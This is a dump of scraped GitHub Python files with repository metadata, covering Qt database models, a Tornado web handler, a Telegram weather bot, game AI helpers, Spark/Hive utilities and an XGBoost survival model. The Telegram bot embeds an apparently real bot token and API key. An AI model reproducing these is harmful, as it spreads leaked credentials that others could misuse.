x[\"alternative_name\"]}[\n self.item_type\n ](item)\n return parameter_identifier(database, item[\"parameter_name\"], names, alternative_name)\n\n def get_set_data_delayed(self, index):\n \"\"\"Returns a function that ParameterValueEditor can call to set data for the given index at any later time,\n even if the model changes.\n\n Args:\n index (QModelIndex)\n\n Returns:\n function\n \"\"\"\n sub_model = self.sub_model_at_row(index.row())\n if sub_model == self.empty_model:\n return lambda value_and_type, index=index: self.setData(index, join_value_and_type(*value_and_type))\n id_ = self.item_at_row(index.row())\n value_field = {\"parameter_value\": \"value\", \"parameter_definition\": \"default_value\"}[self.item_type]\n return lambda value_and_type, sub_model=sub_model, id_=id_: sub_model.update_items_in_db(\n [{\"id\": id_, value_field: join_value_and_type(*value_and_type)}]\n )\n\n def get_entity_class_id(self, index, db_map):\n entity_class_name_key = {\"object_class\": \"object_class_name\", \"relationship_class\": \"relationship_class_name\"}[\n self.entity_class_type\n ]\n entity_class_name = index.sibling(index.row(), self.header.index(entity_class_name_key)).data()\n entity_class = self.db_mngr.get_item_by_field(db_map, self.entity_class_type, \"name\", entity_class_name)\n return entity_class.get(\"id\")\n\n def filter_by(self, rows_per_column):\n for column, rows in rows_per_column.items():\n field = self.headerData(column)\n menu = self._make_auto_filter_menu(field)\n accepted_values = {self.index(row, column).data(Qt.ItemDataRole.DisplayRole) for row in rows}\n menu.set_filter_accepted_values(accepted_values)\n\n def filter_excluding(self, rows_per_column):\n for column, rows in rows_per_column.items():\n field = self.headerData(column)\n menu = self._make_auto_filter_menu(field)\n rejected_values = {self.index(row, column).data(Qt.ItemDataRole.DisplayRole) for row in rows}\n menu.set_filter_rejected_values(rejected_values)\n\n\nclass CompoundObjectParameterMixin:\n \"\"\"Implements the interface for populating and filtering a compound object parameter model.\"\"\"\n\n @property\n def entity_class_type(self):\n return \"object_class\"\n\n\nclass CompoundRelationshipParameterMixin:\n \"\"\"Implements the interface for populating and filtering a compound relationship parameter model.\"\"\"\n\n @property\n def entity_class_type(self):\n return \"relationship_class\"\n\n\nclass CompoundParameterDefinitionMixin:\n \"\"\"Handles signals from db mngr for parameter_definition models.\"\"\"\n\n @property\n def item_type(self):\n return \"parameter_definition\"\n\n\nclass CompoundParameterValueMixin:\n \"\"\"Handles signals from db mngr for parameter_value models.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._filter_entity_ids = dict()\n self._filter_alternative_ids = dict()\n\n def init_model(self):\n super().init_model()\n self._filter_entity_ids = dict()\n self._filter_alternative_ids = dict()\n\n @property\n def item_type(self):\n return \"parameter_value\"\n\n @property\n def entity_type(self):\n \"\"\"Returns the entity type, either 'object' or 'relationship'\n Used by update_single_main_filter.\n\n Returns:\n str\n \"\"\"\n raise NotImplementedError()\n\n def set_filter_entity_ids(self, entity_ids):\n self._filter_entity_ids = entity_ids\n for model in self.single_models:\n if model.set_filter_entity_ids(entity_ids):\n self._invalidate_filter()\n\n def set_filter_alternative_ids(self, alternative_ids):\n self._filter_alternative_ids = alternative_ids\n for model in self.single_models:\n if model.set_filter_alternative_ids(alternative_ids):\n self._invalidate_filter()\n\n def _create_single_model(self, db_map, entity_class_id, committed):\n model = super()._create_single_model(db_map, entity_class_id, committed)\n model.set_filter_entity_ids(self._filter_entity_ids)\n model.set_filter_alternative_ids(self._filter_alternative_ids)\n return model\n\n\nclass CompoundObjectParameterDefinitionModel(\n CompoundObjectParameterMixin, CompoundParameterDefinitionMixin, CompoundParameterModel\n):\n \"\"\"A model that concatenates several single object parameter_definition models\n and one empty object parameter_definition model.\n \"\"\"\n\n def _make_header(self):\n return [\"object_class_name\", \"parameter_name\", \"value_list_name\", \"default_value\", \"description\", \"database\"]\n\n\nclass CompoundRelationshipParameterDefinitionModel(\n CompoundRelationshipParameterMixin, CompoundParameterDefinitionMixin, CompoundParameterModel\n):\n \"\"\"A model that concatenates several single relationship parameter_definition models\n and one empty relationship parameter_definition model.\n \"\"\"\n\n def _make_header(self):\n return [\n \"relationship_class_name\",\n \"object_class_name_list\",\n \"parameter_name\",\n \"value_list_name\",\n \"default_value\",\n \"description\",\n \"database\",\n ]\n\n\nclass CompoundObjectParameterValueModel(\n CompoundObjectParameterMixin, CompoundParameterValueMixin, CompoundParameterModel\n):\n \"\"\"A model that concatenates several single object parameter_value models\n and one empty object parameter_value model.\n \"\"\"\n\n def _make_header(self):\n return [\"object_class_name\", \"object_name\", \"parameter_name\", \"alternative_name\", \"value\", \"database\"]\n\n @property\n def entity_type(self):\n return \"object\"\n\n\nclass CompoundRelationshipParameterValueModel(\n CompoundRelationshipParameterMixin, CompoundParameterValueMixin, CompoundParameterModel\n):\n \"\"\"A model that concatenates several single relationship parameter_value models\n and one empty relationship parameter_value model.\n \"\"\"\n\n def _make_header(self):\n return [\n \"relationship_class_name\",\n \"object_name_list\",\n \"parameter_name\",\n \"alternative_name\",\n \"value\",\n \"database\",\n ]\n\n @property\n def entity_type(self):\n return \"relationship\"\n", "repo_name": "spine-tools/Spine-Toolbox", "sub_path": "spinetoolbox/spine_db_editor/mvcmodels/compound_parameter_models.py", "file_name": "compound_parameter_models.py", "file_ext": "py", "file_size_in_byte": 24136, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 54, "dataset": "github-code", "pt": "31", "api": [{"api_name": "mvcmodels.compound_table_model.CompoundWithEmptyTableModel", "line_number": 22, "usage_type": "name"}, {"api_name": "PySide6.QtCore.QTimer", "line_number": 41, "usage_type": "call"}, {"api_name": "fetch_parent.FlexibleFetchParent", "line_number": 45, "usage_type": "call"}, {"api_name": "single_parameter_models.SingleObjectParameterDefinitionModel", "line_number": 102, "usage_type": "name"}, {"api_name": "single_parameter_models.SingleObjectParameterValueModel", "line_number": 103, "usage_type": "name"}, {"api_name": "single_parameter_models.SingleRelationshipParameterDefinitionModel", "line_number": 106, "usage_type": "name"}, {"api_name": "single_parameter_models.SingleRelationshipParameterValueModel", "line_number": 107, "usage_type": "name"}, {"api_name": "empty_parameter_models.EmptyObjectParameterDefinitionModel", "line_number": 121, "usage_type": "name"}, {"api_name": "empty_parameter_models.EmptyObjectParameterValueModel", "line_number": 122, "usage_type": "name"}, {"api_name": "empty_parameter_models.EmptyRelationshipParameterDefinitionModel", "line_number": 125, "usage_type": "name"}, {"api_name": "empty_parameter_models.EmptyRelationshipParameterValueModel", "line_number": 126, "usage_type": "name"}, {"api_name": "PySide6.QtCore.QModelIndex", "line_number": 151, "usage_type": "call"}, {"api_name": "widgets.custom_menus.ParameterViewFilterMenu", "line_number": 169, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.Orientation", "line_number": 181, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 181, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.ItemDataRole", "line_number": 181, "usage_type": "attribute"}, {"api_name": "PySide6.QtGui.QFont", "line_number": 183, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.ItemDataRole", "line_number": 186, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 186, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.Orientation", "line_number": 187, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 187, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Slot", "line_number": 262, "usage_type": "call"}, {"api_name": "helpers.rows_to_row_count_tuples", "line_number": 430, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.ItemDataRole", "line_number": 446, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 446, "usage_type": "name"}, {"api_name": "helpers.parameter_identifier", "line_number": 485, "usage_type": "call"}, {"api_name": "spinedb_api.parameter_value.join_value_and_type", "line_number": 499, "usage_type": "call"}, {"api_name": "spinedb_api.parameter_value.join_value_and_type", "line_number": 503, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.ItemDataRole", "line_number": 518, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 518, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.ItemDataRole", "line_number": 525, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 525, "usage_type": "name"}]}
+{"seq_id": "69917192413", "text": "#!/usr/bin/env Python\n# coding=utf-8\n\nimport time\nimport tornado.web\nimport methods.readdb as mrd\nimport methods.insertdb as mrd\n\nclass BuyerHandler(tornado.web.RequestHandler):\n def get(self):\n #usernames = mrd.select_columns(table=\"user\",column=\"username\")\n #one_user = usernames[0][0]\n #self.render(\"index.html\", user=one_user)\n self.render(\"buyer.html\")\n\nclass BuyerAddHandler(tornado.web.RequestHandler):\n def get(self):\n #usernames = mrd.select_columns(table=\"user\",column=\"username\")\n #one_user = usernames[0][0]\n #self.render(\"index.html\", user=one_user)\n self.render(\"buyeradd.html\")\n\nclass BuyerAddNewHandler(tornado.web.RequestHandler):\n def post(self):\n weixinname = self.get_argument(\"weixinname\")\n phonenum = self.get_argument(\"phonenum\")\n sex = self.get_argument(\"sex\")\n age = self.get_argument(\"age\")\n username = self.get_argument(\"username\")\n address1 = self.get_argument(\"address1\")\n birsday = self.get_argument(\"birsday\")\n address2 = self.get_argument(\"address2\")\n # if not weixinname:\n # return None\n if not weixinname.strip() or not phonenum.strip() :\n self.write('this is error.\"微信号\\手机号\" 不能是空!')\n self.render(\"buyeradd.html\")\n else:\n bdate = time.strftime('%Y-%m-%d',time.localtime(time.time()))\n user_infos = mrd.buyer_insert_table(table=\"buyuser\",weixinname=weixinname,phonenum=phonenum,sex=sex,age=age,username=username,address1=address1,birsday=birsday,address2=address2,bdate=bdate)\n if not user_infos:\n self.write(\"数据添加成功!\")\n self.render(\"buyeradd.html\")\n else:\n self.write(\"this is error.\")", "repo_name": "levycui/xiyun", "sub_path": "handlers/buyerAdd.py", "file_name": "buyerAdd.py", "file_ext": "py", "file_size_in_byte": 1819, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "tornado.web.web", "line_number": 9, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 9, "usage_type": "name"}, {"api_name": "tornado.web.web", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 16, "usage_type": "name"}, {"api_name": "tornado.web.web", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 23, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 39, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 39, "usage_type": "call"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}, {"api_name": "methods.insertdb.buyer_insert_table", "line_number": 40, "usage_type": "call"}, {"api_name": "methods.insertdb", "line_number": 40, "usage_type": "name"}]}
+{"seq_id": "39598917699", "text": "import requests\nfrom telegram.ext import Updater, CommandHandler\n\n# Функция-обработчик команды /start\ndef start(update, context):\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Привет! Я бот погоды. Введите команду /weather <город>, чтобы узнать текущую погоду.\")\n\n# Функция-обработчик команды /weather\ndef weather(update, context):\n if len(context.args) == 0:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Пожалуйста, укажите город.\")\n return\n\n city = ' '.join(context.args)\n api_key = '56b30cb255.3443075' # Замените на ваш API-ключ погоды\n url = f\"http://api.openweathermap.org/data/2.5/weather?q={city}&appid={api_key}&units=metric\"\n\n response = requests.get(url)\n data = response.json()\n\n if data['cod'] == '404':\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Город не найден.\")\n return\n\n temperature = data['main']['temp']\n weather_desc = data['weather'][0]['description']\n message = f\"Текущая погода в {city}: {temperature}°C, {weather_desc}.\"\n\n context.bot.send_message(chat_id=update.effective_chat.id, text=message)\n\n# Инициализация бота и добавление обработчиков команд\nupdater = Updater(token='6568139398:AAGJQnWWrYGZkgH-djue2F5PSmKjMJ_5yaY', use_context=True) # Замените на токен вашего бота\n\nstart_handler = CommandHandler('start', start)\nweather_handler = CommandHandler('weather', weather)\n\nupdater.dispatcher.add_handler(start_handler)\nupdater.dispatcher.add_handler(weather_handler)\n\n# Запуск бота\nupdater.start_polling()\n", "repo_name": "HellCrow100500/Weather", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1826, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 32, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "42868687948", "text": "import logging\nimport random\n\nfrom utilities.utilities import Utility\nfrom common.direction import Direction\nfrom common.coordinates import Coordinates\nfrom utilities.color import Color\nfrom config import Config\nfrom messaging import messaging, MessageType\nfrom utilities.entityfinder import EntityFinder\nimport system.graphics.renderable\nimport system.gamelogic.enemy\n\nlogger = logging.getLogger(__name__)\n\n\nclass AiHelper(object):\n @staticmethod\n def canAttackPlayer(owner, playerLocation):\n if playerLocation is None:\n return False\n\n meRenderable = owner.world.component_for_entity(\n owner.entity, system.graphics.renderable.Renderable)\n meOffensiveAttack = owner.world.component_for_entity(\n owner.entity, system.gamelogic.offensiveattack.OffensiveAttack)\n\n currentWeaponHitArea = meOffensiveAttack.getCurrentWeaponHitArea()\n\n if Config.showEnemyWeaponHitCollisionDetectionTargets:\n for hitlocation in currentWeaponHitArea.hitCd:\n messaging.add(\n type=MessageType.EmitTextureMinimal,\n data={\n 'char': 'X',\n 'timeout': 0.2,\n 'coordinate': hitlocation,\n 'color': Color.grey\n }\n )\n\n # only one of the hitlocations need to hit\n for hitLocation in currentWeaponHitArea.hitCd:\n canAttack = Utility.isPointInArea(\n hitLocation,\n playerLocation)\n if canAttack:\n return True\n return False\n\n\n @staticmethod\n def getAttackVectorToPlayer(owner, meRenderable):\n # enemy will walk to this distance\n # allows player to come close\n # but not inside of him, will walk backwards\n keepDistance = 1\n\n attackBaseLocation = meRenderable.getAttackBaseLocation()\n attackBaseLocationInverted = meRenderable.getAttackBaseLocationInverted()\n\n playerEntity = EntityFinder.findPlayer(owner.world)\n # player not spawned\n if not playerEntity:\n return\n\n plyrRend = owner.world.component_for_entity(\n playerEntity, system.graphics.renderable.Renderable)\n playerLocation = plyrRend.getLocation()\n\n # check distance, from both the direction we are facing, \n # and the other one\n distanceNormal = Utility.distance(playerLocation, attackBaseLocation)\n distanceInverted = Utility.distance(playerLocation, attackBaseLocationInverted)\n\n # logger.info(\"--- Loc Enemy : {} / {}\".format(\n # meRenderable.coordinates.x, \n # meRenderable.coordinates.x + meRenderable.texture.width - 1))\n # logger.info(\"--- Loc Player: {}\".format(playerRenderable.coordinates.x))\n\n # decide on which reference point we will take\n # and if we wanna change direction\n atkLoc = None\n dontChangeDirection = False\n if distanceNormal['x'] < distanceInverted['x']:\n # logger.info(\"--- n: {} i: {} dontChange, use normal\".format(\n # distanceNormal['x'], distanceInverted['x']\n # ))\n dontChangeDirection = True\n atkLoc = attackBaseLocation\n else:\n # logger.info(\"--- n: {} i: {} change, use inverted\".format(\n # distanceNormal['x'], distanceInverted['x']\n # ))\n dontChangeDirection = False\n atkLoc = attackBaseLocationInverted\n\n # logger.info(\"--- Loc Atk : {}\".format(attackLoc.x))\n\n moveX = 0\n moveY = 0\n # check if player overlaps with out attackpoint\n # if yes, we are too close\n if (atkLoc.x >= plyrRend.coordinates.x\n and atkLoc.x <= plyrRend.coordinates.x + plyrRend.texture.width - 1):\n # logger.info(\"--- Overlap :-(\")\n # if refLoc.x >= playerRenderable.coordinates.x:\n if meRenderable.direction is Direction.left:\n if Config.xDoubleStep:\n moveX = 2\n else:\n moveX = 1\n else:\n if Config.xDoubleStep:\n moveX = -2\n else:\n moveX = -1\n\n # logger.info(\"--- Overlap decision: {}\".format(moveX))\n\n else:\n # logger.info(\"--- No overlap :-)\")\n\n playerref = 0\n if atkLoc.x <= playerLocation.x + int(plyrRend.texture.width / 2):\n # logger.info(\"--- Enemy is left of player\")\n playerref = playerLocation.x\n else:\n # logger.info(\"--- Enemy is right of player. Ex:{} Px:{}\".format(\n # attackLoc.x, playerRenderable.coordinates.x\n # ))\n playerref = playerLocation.x + plyrRend.texture.width - 1\n\n tempDistance = atkLoc.x - playerref\n if tempDistance > keepDistance:\n if Config.xDoubleStep:\n moveX = -2\n else:\n moveX = -1\n elif tempDistance < -keepDistance:\n if Config.xDoubleStep:\n moveX = 2\n else:\n moveX = 1\n\n # logger.info(\"--- Distance: {} because {} - {} \".format(\n # tempDistance, attackLoc.x, playerref))\n\n # logger.info(\"--- Enemy: moveX: {} dontChangeDirection: {}\".format(\n # moveX, dontChangeDirection\n # ))\n\n # we can walk diagonally, no elif here\n if attackBaseLocation.y < playerLocation.y:\n moveY = 1\n elif attackBaseLocation.y > playerLocation.y + plyrRend.texture.height - 1:\n moveY = -1\n\n return moveX, moveY, dontChangeDirection\n\n\n @staticmethod\n def getVectorToPlayer(source, dest):\n x = 0\n y = 0\n if dest.x > source.x:\n if Config.xDoubleStep:\n x = 2\n else:\n x = 1\n elif dest.x < source.x:\n if Config.xDoubleStep:\n x = -2\n else:\n x = -1\n\n if dest.y > source.y:\n y = 1\n elif dest.y < source.y:\n y = -1\n\n return x, y\n\n\n @staticmethod\n def pickDestAroundPlayer(meRenderable, distanceX, distanceY):\n ptRight = random.choice([True, False])\n ptDown = random.choice([True, False])\n\n coord = Coordinates(\n meRenderable.getLocation().x,\n meRenderable.getLocation().y\n )\n\n if ptRight:\n coord.x += distanceX + random.randint(2, 6)\n else:\n coord.x -= distanceX + random.randint(2, 6)\n\n if ptDown:\n coord.y += distanceY + random.randint(-2, 2)\n #if coord.y > Config.rows - 2 - meRenderable.texture.height:\n # coord.y = Config.rows - 2 - meRenderable.texture.height\n else:\n coord.y -= distanceY + random.randint(-2, 2)\n # +1 so they can overlap only a bit on top\n #if coord.y < Config.topborder - meRenderable.texture.height + 1:\n # coord.y = Config.topborder - meRenderable.texture.height + 1\n\n # make sure destination is on-screen\n if coord.y < Config.topborder:\n coord.y = Config.topborder\n if coord.y > Config.rows + meRenderable.texture.height:\n coord.y = Config.rows + meRenderable.texture.height\n\n return coord\n", "repo_name": "dobin/nkeyrollover", "sub_path": "ai/aihelper.py", "file_name": "aihelper.py", "file_ext": "py", "file_size_in_byte": 7535, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "system.graphics.renderable.graphics", "line_number": 24, "usage_type": "attribute"}, {"api_name": "system.graphics.renderable", "line_number": 24, "usage_type": "name"}, {"api_name": "system.graphics.renderable.gamelogic", "line_number": 26, "usage_type": "attribute"}, {"api_name": "system.graphics.renderable", "line_number": 26, "usage_type": "name"}, {"api_name": "config.Config.showEnemyWeaponHitCollisionDetectionTargets", "line_number": 30, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 30, "usage_type": "name"}, {"api_name": "messaging.messaging.add", "line_number": 32, "usage_type": "call"}, {"api_name": "messaging.messaging", "line_number": 32, "usage_type": "name"}, {"api_name": "messaging.MessageType.EmitTextureMinimal", "line_number": 33, "usage_type": "attribute"}, {"api_name": "messaging.MessageType", "line_number": 33, "usage_type": "name"}, {"api_name": "utilities.color.Color.grey", "line_number": 38, "usage_type": "attribute"}, {"api_name": "utilities.color.Color", "line_number": 38, "usage_type": "name"}, {"api_name": "utilities.utilities.Utility.isPointInArea", "line_number": 44, "usage_type": "call"}, {"api_name": "utilities.utilities.Utility", "line_number": 44, "usage_type": "name"}, {"api_name": "utilities.entityfinder.EntityFinder.findPlayer", "line_number": 62, "usage_type": "call"}, {"api_name": "utilities.entityfinder.EntityFinder", "line_number": 62, "usage_type": "name"}, {"api_name": "system.graphics.renderable.graphics", "line_number": 68, "usage_type": "attribute"}, {"api_name": "system.graphics.renderable", "line_number": 68, "usage_type": "name"}, {"api_name": "utilities.utilities.Utility.distance", "line_number": 73, "usage_type": "call"}, {"api_name": "utilities.utilities.Utility", "line_number": 73, "usage_type": "name"}, {"api_name": "utilities.utilities.Utility.distance", "line_number": 74, "usage_type": "call"}, {"api_name": "utilities.utilities.Utility", "line_number": 74, "usage_type": "name"}, {"api_name": "common.direction.Direction.left", "line_number": 108, "usage_type": "attribute"}, {"api_name": "common.direction.Direction", "line_number": 108, "usage_type": "name"}, {"api_name": "config.Config.xDoubleStep", "line_number": 109, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 109, "usage_type": "name"}, {"api_name": "config.Config.xDoubleStep", "line_number": 114, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 114, "usage_type": "name"}, {"api_name": "config.Config.xDoubleStep", "line_number": 136, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 136, "usage_type": "name"}, {"api_name": "config.Config.xDoubleStep", "line_number": 141, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 141, "usage_type": "name"}, {"api_name": "config.Config.xDoubleStep", "line_number": 167, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 167, "usage_type": "name"}, {"api_name": "config.Config.xDoubleStep", "line_number": 172, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 172, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 187, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 188, "usage_type": "call"}, {"api_name": "common.coordinates.Coordinates", "line_number": 190, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 196, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 198, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 201, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 205, "usage_type": "call"}, {"api_name": "config.Config.topborder", "line_number": 211, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 211, "usage_type": "name"}, {"api_name": "config.Config.topborder", "line_number": 212, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 212, "usage_type": "name"}, {"api_name": "config.Config.rows", "line_number": 213, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 213, "usage_type": "name"}, {"api_name": "config.Config.rows", "line_number": 214, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 214, "usage_type": "name"}]}
+{"seq_id": "37727549285", "text": "import json\nfrom typing import Callable\n\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import *\n\n\ndef init_spark(app_name, warehouse_dir):\n conf = SparkConf().setAppName(app_name)\n sc = SparkContext(conf=conf)\n\n spark = (\n SparkSession.builder\n .config(\"spark.sql.warehouse.dir\", warehouse_dir)\n .enableHiveSupport()\n .getOrCreate()\n )\n\n return spark\n\n\ndef infer_schema(spark, json_data_list):\n # Create a temporary DataFrame to infer the schema\n temp_df = spark.read.json(spark.sparkContext.parallelize(\n [json.dumps(json_data_list[0])]), multiLine=True)\n\n # Return the inferred schema\n return temp_df.schema\n\n\ndef create_hive_table(spark, data, database_name, table_name):\n # Create the Hive database if needed\n spark.sql(f\"CREATE DATABASE IF NOT EXISTS {database_name}\")\n\n hive_table = f\"{database_name}.{table_name}\"\n spark.sql(f\"DROP TABLE IF EXISTS {hive_table}\")\n\n data.createOrReplaceTempView(\"data_view\")\n spark.sql(\n f\"CREATE TABLE {hive_table} USING parquet OPTIONS('compression'='snappy') AS SELECT * FROM data_view\")\n\n\ndef read_config(config_file):\n with open(config_file, \"r\") as f:\n config = json.load(f)\n return config\n\n\ndef process_data(read_json_data: Callable):\n # Read the config.json file\n config = read_config(\"config.json\")\n\n # Initialize Spark\n spark = init_spark(\"Spark-Streaming\", config[\"local\"][\"warehouse_dir\"])\n\n # Get the JSON data\n json_data_list = read_json_data(config)\n\n # Get schema from the JSON data\n schema = infer_schema(spark, json_data_list)\n\n # Create a DataFrame from the data\n data = spark.createDataFrame(json_data_list, schema=schema)\n\n # Load the Hive table\n create_hive_table(\n spark, data, config[\"database_name\"], config[\"table_name\"])\n\n\nif __name__ == \"__main__\":\n raise Exception(\n \"Please run either google_cloud_script.py or local_script.py\")\n", "repo_name": "Eu-Bitwise/spark-json-streaming", "sub_path": "app/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 2009, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pyspark.SparkConf", "line_number": 10, "usage_type": "call"}, {"api_name": "pyspark.SparkContext", "line_number": 11, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder.config", "line_number": 14, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 14, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "json.load", "line_number": 46, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 50, "usage_type": "name"}]}
+{"seq_id": "32766871771", "text": "from xgbsurv.models.breslow_final import breslow_likelihood, breslow_objective, \\\n get_cumulative_hazard_function_breslow\nfrom xgbsurv.models.efron_final import efron_likelihood, efron_objective, \\\n get_cumulative_hazard_function_efron\nfrom xgbsurv.models.cind_final import cind_loss, cind_objective \nfrom xgbsurv.models.deephit_pycox_final import deephit_loss1_pycox, deephit_pycox_objective \nfrom xgbsurv.models.eh_aft_final import aft_likelihood, aft_objective, \\\n get_cumulative_hazard_function_aft\nfrom xgbsurv.models.eh_ah_final import ah_likelihood, ah_objective, \\\n get_cumulative_hazard_function_ah\nfrom xgbsurv.models.eh_final import eh_likelihood, eh_objective,\\\n get_cumulative_hazard_function_eh\nfrom xgbsurv.models.utils import transform_back, sort_X_y_pandas\nfrom xgbsurv.docstrings.xgbsurv_docstrings import get_xgbsurv_docstring, \\\nget_xgbsurv_fit_docstring\nfrom xgboost import XGBRegressor\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\n\n# dicts of objective, loss and prediction functions\nloss_dict = {\n 'breslow_loss': breslow_likelihood, \n 'efron_loss': efron_likelihood, \n 'cind_loss': cind_loss, \n 'deephit_loss':deephit_loss1_pycox, \n 'aft_loss':aft_likelihood, \n 'ah_loss':ah_likelihood, \n 'eh_loss': eh_likelihood\n }\n\n\nobjective_dict = {\n 'breslow_objective': breslow_objective,\n 'efron_objective': efron_objective, \n 'cind_objective': cind_objective, \n 'deephit_objective':deephit_pycox_objective, \n 'aft_objective':aft_objective, \n 'ah_objective':ah_objective,\n 'eh_objective': eh_objective\n }\n\npred_dict = {\n 'breslow_objective': get_cumulative_hazard_function_breslow, \n 'efron_objective': get_cumulative_hazard_function_efron, \n 'aft_objective': get_cumulative_hazard_function_aft,\n 'ah_objective': get_cumulative_hazard_function_ah,\n 'eh_objective': get_cumulative_hazard_function_eh,\n }\n\nclass XGBSurv(XGBRegressor):\n \"\"\"XGBSurv - Gradient Boosted Decision Trees for Survival Analysis.\"\"\"\n __doc__ = get_xgbsurv_docstring()\n\n def __init__(self, *, objective=None, eval_metric=None, **kwargs) -> None:\n self.cum_hazard_baseline = None\n self.model_type = None\n if objective in objective_dict:\n obj = objective_dict[objective]\n self.model_type = objective\n elif callable(objective):\n obj = objective\n else:\n obj = objective\n\n if eval_metric in loss_dict:\n eval_loss = loss_dict[eval_metric]\n elif callable(objective):\n eval_loss = eval_metric\n else:\n eval_loss = eval_metric \n\n super().__init__(objective=obj, eval_metric= eval_loss, **kwargs)\n #disable_default_eval_metric=disable,\n\n def fit(self, X, y, *, eval_test_size=None, **kwargs):\n __doc__ = get_xgbsurv_fit_docstring()\n\n #print('types',type(X),type(y))\n #Ct transforms to numpy array to mixtures are expected\n if isinstance(X, np.ndarray) and isinstance(y, pd.Series):\n y = y.values\n \n if isinstance(X, np.ndarray) and isinstance(y, pd.DataFrame):\n y = y.values\n\n if isinstance(X, pd.DataFrame) and isinstance(y, pd.Series):\n X, y = sort_X_y_pandas(X, y)\n elif isinstance(X, np.ndarray) and isinstance(y, np.ndarray):\n X, y = self._sort_X_y(X, y)\n else:\n print(\"Data type is not correct - use either pandas DataFrame/Series or numpy ndarray. \")\n\n if eval_test_size is not None:\n \n params = super(XGBRegressor, self).get_xgb_params()\n \n #TODO: verify for deephit split\n #target_sign = np.sign(y) beware of deephit dims\n X_train, X_test, y_train, y_test = train_test_split(\n X, \n y, \n test_size=eval_test_size,\n random_state=params['random_state'],\n stratify=np.sign(y)) \n #print('types2',type(X_train),type(y_train))\n #print('types3',type(X_test),type(y_test))\n #print('shapes', X_train.shape,y_train.shape)\n #print('shapes 2', X_test.shape,y_test.shape)\n if isinstance(X_train, pd.DataFrame) and isinstance(y_train, pd.Series):\n X_train, y_train = sort_X_y_pandas(X_train, y_train)\n\n elif isinstance(X_train, np.ndarray) and isinstance(y_train, np.ndarray):\n X_train, y_train = self._sort_X_y(X_train, y_train)\n\n elif isinstance(X_test, pd.DataFrame) and isinstance(y_test, pd.Series):\n X_test, y_test = sort_X_y_pandas(X_test, y_test)\n\n elif isinstance(X_test, np.ndarray) and isinstance(y_test, np.ndarray):\n X_test, y_test = self._sort_X_y(X_test, y_test)\n # eh case\n elif isinstance(X_train, pd.DataFrame) and isinstance(y_train, pd.DataFrame):\n X_train, y_train = sort_X_y_pandas(X_train, y_train)\n \n elif isinstance(X_test, pd.DataFrame) and isinstance(y_test, pd.DataFrame):\n X_test, y_test = sort_X_y_pandas(X_test, y_test)\n\n else:\n print(\"Data type is not correct - use either pandas DataFrame/Series or numpy ndarray. \")\n \n\n # 1. column training loss\n # 2. column 